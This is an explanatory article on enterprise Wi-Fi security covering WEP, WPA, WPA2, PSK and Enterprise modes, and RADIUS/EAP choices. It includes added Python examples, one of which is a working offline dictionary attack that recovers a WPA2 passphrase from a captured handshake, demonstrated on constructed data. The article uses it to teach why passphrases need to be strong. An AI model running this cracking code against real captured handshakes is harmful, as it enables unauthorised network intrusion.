Today's IT teams spend countless hours keeping wireless enterprise networks safe from the perils that permeate the radio waves.
Passive eavesdroppers can gather proprietary information, logins, and passwords. Intruders can steal bandwidth to transmit spam or use a network as a springboard to attack others. Even a low-tech attacker can harm a business by launching packet floods against its access points (APs) and the servers behind them.
At the start of the millennium, the Wired Equivalent Privacy (WEP) security protocol provided security for wireless enterprises by encrypting data so that it was protected during transmission between endpoints. WEP used a shared secret key to encrypt data moving between the AP and receiving stations. Unfortunately, a decade ago, researchers discovered a flaw in the way WEP applied its RC4 cipher: a passive eavesdropper who collected enough packets could recover the encryption key. Once developed into an exploit, software running on any off-the-shelf laptop could crack WEP in a matter of minutes. Inevitably, WEP was replaced in 2003 by the Wi-Fi Protected Access (WPA) security protocol and security certification program.
WPA: Deepening security authentication
WPA (based on a draft of the IEEE 802.11i standard) addressed most of the known vulnerabilities of WEP. Primarily intended for wireless enterprise networks, WPA implemented several significant changes.
First, it added IEEE 802.1X authentication with the Extensible Authentication Protocol (EAP), so that only authenticated users could join the network. EAP itself is an authentication framework rather than an encryption system; its certificate-based methods, such as EAP-TLS, are the ones that rely on public-key cryptography. Second, WPA improved data encryption through the Temporal Key Integrity Protocol (TKIP), which mixes a fresh per-packet key for the underlying RC4 cipher so that the WEP key-recovery attack no longer applies. Finally, a message-integrity check (MIC, known as Michael) was added so that the receiver can detect packets that an attacker altered or forged in transit. (No integrity check can reveal whether a packet was merely captured; only encryption limits what a capture is worth.)
Within a few years, however, researchers found weaknesses in TKIP that combined limitations inherited from WEP with the limited strength of the Michael MIC, allowing an attacker to decrypt and inject a small number of frames, though not to recover the key.
WPA2: Tightening the encryption
Available since 2004, WPA2 implements the mandatory elements of the IEEE 802.11i standard. And beginning in March 2006, WPA2 certification by the Wi-Fi Alliance became required for all new devices to bear the Wi-Fi trademark.
WPA2 introduces the AES (Advanced Encryption Standard) block cipher, used in CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol), which provides confidentiality and integrity in a single construction, to tighten the security of both home networks and business enterprises. Fresh per-session encryption keys are derived for every connection: in Enterprise mode after a user logs in or presents a valid digital certificate, in PSK mode from the shared passphrase. WPA2 can be implemented in one of two modes:
- Pre-Shared Key (PSK) Mode – For home and small-office Wi-Fi networks, the owner defines one encryption passphrase on the wireless router and any other APs. Every user enters that same passphrase when connecting. Because the passphrase is shared, it must be changed on every device whenever anyone who knows it leaves, and a single captured connection handshake lets an attacker test passphrase guesses offline, so a PSK must be long and random.
- Enterprise Mode – Organizations that need the strongest available wireless security should use Wi-Fi Protected Access 2 Enterprise (WPA2-Enterprise), in which each user authenticates individually through IEEE 802.1X and receives unique session keys. To improve the resiliency of mission-critical networks, WPA2 was recently enhanced with Protected Management Frames (IEEE 802.11w), which further harden WPA2 against eavesdropping on, and forgery of, management frames such as deauthentication. All Wi-Fi CERTIFIED devices support WPA2 for added protection.
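The following is an added example, not code from the original article, showing what "offline passphrase guessing" in PSK mode actually means: how the passphrase and SSID become the Pairwise Master Key (PMK), how the four-way handshake turns the PMK into the per-session Pairwise Transient Key (PTK), and how an eavesdropper who recorded one handshake checks candidate passphrases without sending a single packet. The SSID, MAC addresses, nonces, EAPOL frame and word list are constructed for the example; the derivation functions follow IEEE 802.11i, and the first known-answer value is the standard's own test vector.

```python
import hashlib
import hmac

# Added example (not from the original article). The SSID, MAC addresses, nonces,
# EAPOL frame and word list below are constructed; the key derivations follow
# IEEE 802.11i.


def passphrase_to_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK derivation: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    Everything here except the PMK is visible in the clear during the handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(ptk: bytes, eapol_frame: bytes) -> bytes:
    """EAPOL-Key MIC for WPA2/CCMP: HMAC-SHA1 keyed with the KCK (first 16 bytes of the PTK),
    over the EAPOL frame with its MIC field zeroed, truncated to 128 bits."""
    kck = ptk[:16]
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """Offline dictionary attack. Nothing is transmitted; each guess costs one PBKDF2 run
    (4096 SHA-1 rounds), one PRF-512 and one HMAC. Returns the matching passphrase or None."""
    for guess in wordlist:
        try:
            pmk = passphrase_to_pmk(guess, ssid)
        except ValueError:
            continue  # shorter than 8 or longer than 63 characters cannot be a valid passphrase
        ptk = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk, eapol_frame), captured_mic):
            return guess
    return None


def build_sample_handshake(passphrase: str):
    """Constructed capture: what an eavesdropper records from message 2 of the four-way
    handshake between a constructed AP and station. Returns every argument that
    crack_handshake() needs except the word list."""
    ssid = "CorpGuest"
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))          # fixed nonces keep the example deterministic
    snonce = bytes(range(32, 64))
    # Constructed stand-in for the message-2 EAPOL-Key frame (which carries the SNonce)
    # with its 16-byte MIC field zeroed, as it is when the MIC is computed.
    eapol_frame = bytes.fromhex("0203005f02010a00") + b"\x00" * 16 + snonce + b"\x00" * 16
    ptk = derive_ptk(passphrase_to_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, eapol_mic(ptk, eapol_frame)


if __name__ == "__main__":
    # Known-answer check from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
    assert passphrase_to_pmk("password", "IEEE").hex().startswith("f42c6fc52df0ebef")
    capture = build_sample_handshake("CorpGuest2014")
    wordlist = ["letmein", "password", "Corp2014", "CorpGuest2014", "correcthorsebatterystaple"]
    print("recovered passphrase:", crack_handshake(*capture, wordlist))
```

The 4096-round PBKDF2 is the only thing slowing the attacker down, and it is a fixed cost per guess that dedicated hardware handles at millions of guesses per second; a passphrase drawn from a word list falls quickly, while a long random one does not. Note also that the SSID is the PBKDF2 salt, so a common SSID name lets an attacker precompute PMKs once and reuse them against every network with that name. Enterprise mode sidesteps all of this: the PMK comes from the per-user EAP exchange, not from anything guessable.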
WPA2-Enterprise deployment includes installing a RADIUS server (or establishing an outsourced service), configuring access points with the encryption settings and the RADIUS server's address and shared secret, configuring your operating system with the encryption and IEEE 802.1X settings, and then connecting to your secure wireless enterprise.
Enterprise authentication and communication: The RADIUS server and EAP
The standard for carrying EAP over a wired or wireless LAN is IEEE 802.1X. In this authentication framework, the client device that wants to join, such as a laptop or smartphone, is the supplicant; the AP (or wireless controller) that controls the network port is the authenticator; and the RADIUS (Remote Authentication Dial-In User Service) server that actually verifies the credentials is the authentication server. The authenticator relays EAP messages between supplicant and RADIUS server without interpreting them.
Users are given individual login credentials (or client certificates) to present when connecting; they never see the encryption keys, and no long-term network key is stored on the device. This protects the wireless network against terminated employees or lost devices: disabling one account or revoking one certificate at the RADIUS server locks out one user without touching anyone else. The authentication is port-based: when a device associates, the authenticator opens only an uncontrolled port that passes EAP traffic (EAPOL) and nothing else. If authentication succeeds, the RADIUS server delivers the session's master key to the authenticator inside its Access-Accept, the AP and client run the four-way handshake to derive the per-session encryption keys, and the controlled port opens to give the user full access.
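The following is an added example, not code from the original article, of the key-delivery step just described: after a successful EAP exchange the RADIUS server puts the session master key (PMK) into a Microsoft vendor-specific attribute, MS-MPPE-Recv-Key, in its Access-Accept, scrambled with the RADIUS shared secret and the Request-Authenticator of the Access-Request it answers (RFC 2548). The functions, the shared secret and the sample values are constructed for illustration; the scrambling and the attribute layout follow the RFC.

```python
import hashlib
import os
import struct

# Added example (not from the original article). The shared secret, Request-
# Authenticator and key values used with it are constructed; the scrambling is
# RFC 2548 section 2.4.2 and the attribute layout is RADIUS attribute 26.

MICROSOFT_VENDOR_ID = 311
MS_MPPE_SEND_KEY = 16
MS_MPPE_RECV_KEY = 17   # for 802.1X the PMK travels in MS-MPPE-Recv-Key


def mppe_wrap_key(secret: bytes, request_authenticator: bytes, key: bytes, salt: bytes) -> bytes:
    """RFC 2548 key scrambling. Returns Salt || C(1) || ... || C(n)."""
    if len(request_authenticator) != 16:
        raise ValueError("Request-Authenticator must be 16 bytes")
    if len(salt) != 2 or not salt[0] & 0x80:
        raise ValueError("Salt must be 2 bytes with the high bit set")
    # P = Key-Length || Key, zero-padded to a multiple of 16 bytes.
    plaintext = bytes([len(key)]) + key
    plaintext += b"\x00" * (-len(plaintext) % 16)
    out = bytearray()
    prev = request_authenticator + salt    # b(1) = MD5(S || R || A)
    for i in range(0, len(plaintext), 16):
        b = hashlib.md5(secret + prev).digest()
        c = bytes(p ^ k for p, k in zip(plaintext[i:i + 16], b))
        out += c
        prev = c                             # b(i) = MD5(S || c(i-1))
    return salt + bytes(out)


def mppe_unwrap_key(secret: bytes, request_authenticator: bytes, value: bytes):
    """Inverse of mppe_wrap_key. Returns the key, or None when the result is malformed,
    which is what a wrong shared secret or a tampered attribute looks like to the AP."""
    salt, ciphertext = value[:2], value[2:]
    if len(ciphertext) == 0 or len(ciphertext) % 16:
        return None
    plaintext = bytearray()
    prev = request_authenticator + salt
    for i in range(0, len(ciphertext), 16):
        block = ciphertext[i:i + 16]
        b = hashlib.md5(secret + prev).digest()
        plaintext += bytes(c ^ k for c, k in zip(block, b))
        prev = block
    key_len = plaintext[0]
    if key_len == 0 or key_len > len(plaintext) - 1:
        return None
    if any(plaintext[1 + key_len:]):
        return None  # padding must be all zero
    return bytes(plaintext[1:1 + key_len])


def encode_vsa(vendor_type: int, value: bytes) -> bytes:
    """Wrap a value as RADIUS attribute 26 (Vendor-Specific) under Microsoft's Vendor-Id."""
    inner = struct.pack("!BB", vendor_type, 2 + len(value)) + value
    return struct.pack("!BBI", 26, 6 + len(inner), MICROSOFT_VENDOR_ID) + inner


def decode_vsa(attr: bytes):
    """Return (vendor_type, value) for a Microsoft VSA, or None if the bytes are not one."""
    if len(attr) < 8 or attr[0] != 26 or attr[1] != len(attr):
        return None
    if struct.unpack("!I", attr[2:6])[0] != MICROSOFT_VENDOR_ID:
        return None
    vendor_type, vendor_len = attr[6], attr[7]
    if vendor_len != len(attr) - 6:
        return None
    return vendor_type, attr[8:]


def radius_server_sends_pmk(secret: bytes, request_authenticator: bytes, pmk: bytes) -> bytes:
    """Authentication-server side: the MS-MPPE-Recv-Key attribute carrying the PMK."""
    salt = bytes([0x80 | os.urandom(1)[0], os.urandom(1)[0]])  # unique per attribute
    return encode_vsa(MS_MPPE_RECV_KEY, mppe_wrap_key(secret, request_authenticator, pmk, salt))


def authenticator_receives_pmk(secret: bytes, request_authenticator: bytes, attr: bytes):
    """Authenticator (AP) side: recover the PMK, or None if the attribute is unusable."""
    decoded = decode_vsa(attr)
    if decoded is None or decoded[0] != MS_MPPE_RECV_KEY:
        return None
    return mppe_unwrap_key(secret, request_authenticator, decoded[1])


if __name__ == "__main__":
    secret = b"constructed-shared-secret"
    req_auth = os.urandom(16)              # copied from the matching Access-Request
    pmk = os.urandom(32)                   # produced by the EAP method, e.g. EAP-TLS
    attr = radius_server_sends_pmk(secret, req_auth, pmk)
    print("AP recovered PMK:", authenticator_receives_pmk(secret, req_auth, attr) == pmk)
```

With the recovered PMK the AP runs the same four-way handshake as in PSK mode, but this PMK is unique to the user and the session and was never derived from anything guessable. The practitioner's caveat is that the only protection on this hop is the RADIUS shared secret in an MD5-based construction: use a long random secret per AP, and keep RADIUS traffic on a management network rather than one the Wi-Fi clients can reach.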
RADIUS server options
Once you decide on which of the following RADIUS server options to use, you will set it up in the corresponding EAP, AP, and user settings.
- Windows Server -- if you have a Windows Server set up, you can use either the Internet Authentication Service (IAS) in Windows Server 2003 or the Network Policy Server (NPS) in Windows Server 2008 and later.
- FreeRADIUS -- this server is a free open source project and the preferred choice of advanced IT personnel. It is available for the Linux, Mac OS X, and Windows platforms.
- Outsourced Services -- if you have multiple offices or lack technical IT expertise, a hosting service is a good option. Many services provide more than just RADIUS server hosting. They can also help with the setup process, do user on-boarding, and provide real-time reporting functionality. In addition, many companies offer mobile applications that make configuring mobile devices quick and painless for Apple iOS, Android, and Kindle Fire users. Check out No Wires Security and ServerPlus to learn more.
Your EAP choice depends on the level of security you need and your server/client specs. Although there are more than ten EAP types, these three are the most popular:
- PEAP (Protected EAP) -- this method opens a TLS tunnel to the RADIUS server, authenticated by the server's certificate, and then checks the username and password the user enters (usually with MS-CHAPv2) inside that tunnel. It is one of the easiest EAP types to implement because clients need only credentials, not certificates. The one setting not to skip is server-certificate validation on the clients (trusted CA and expected server name); a client that accepts any certificate will hand its password hash to a rogue AP that impersonates your SSID.
- TLS (EAP-TLS) -- although this EAP type requires more time to implement and maintain, it is the most secure of the three because client and server authenticate each other with X.509 certificates (the same kind used by SSL/TLS on the web). Instead of entering usernames and passwords, each end-user device must hold its own certificate and private key. You run the certificate authority (or use your enterprise PKI) and issue and revoke the client certificates.
- TTLS (EAP-TTLS) -- like PEAP, this method needs a certificate only on the server, not on the clients, so it reduces network management time while still carrying the user's credentials inside a TLS tunnel. However, because Windows versions before Windows 8 have no native EAP-TTLS support, older Microsoft clients require a third-party supplicant.
The steps for configuring the APs with the encryption and RADIUS server information -- and for configuring your operating system with the IEEE 802.1X settings -- depend on your server and client specs. Consult your hardware and software manufacturers for guidance.
Standards and the Wi-Fi Alliance
There's no end to the task of protecting against data theft and managing risk and compliance in the wireless enterprise. Key challenges in wireless security vary widely and continue to evolve because every enterprise is different. Some IT teams struggle with the impact of BYOD (bring your own device) while others seek ways to allow guest access without compromising security of mission-critical systems. The IEEE 802.11 working group and Wi-Fi Alliance continue to address emerging enterprise needs in the space as best they can. In addition, major platform vendors often provide ways to assist in the management of security measures, helping to reduce the resources needed and overall time spent on IT management.
Wi-Fi continues to grow and adapt to business needs. While 2.4 GHz may be the norm in modern wireless networking, IEEE 802.11 specifications provide for many more options. Wireless network products using the Wi-Fi brand may operate in the 2.4, 3.6, 5, and 60 GHz frequency bands. Published in December 2013, amendment IEEE 802.11ac builds on IEEE 802.11n (October 2009) to include wider channels in the 5 GHz band, more spatial streams, higher order modulation, and the addition of multi-user MIMO (multiple input/multiple output).
"The emergence of IEEE 802.11ac doesn't necessitate changes in the current industry-standard security protocols," says Kevin Robinson, director of program marketing for the Wi-Fi Alliance. "Wi-Fi CERTIFIED 'ac' does present an opportunity for enterprises using old equipment to migrate to a newer infrastructure and depart from earlier security mechanisms."
The Wi-Fi Alliance is in the early stages of developing a certification program for Suite B, the NSA-specified set of cryptographic algorithms for encryption, key exchange, digital signatures, and hashing intended for highly sensitive security domains. Suite B will likely be the next level of wireless protection. Until then, we have Wi-Fi with WPA2 and Protected Management Frames, which should suffice for the vast majority of modern organizations.
Make sure your group has adopted the latest technologies described here. Enjoy the convenience and productivity of Wi-Fi, but do it safely.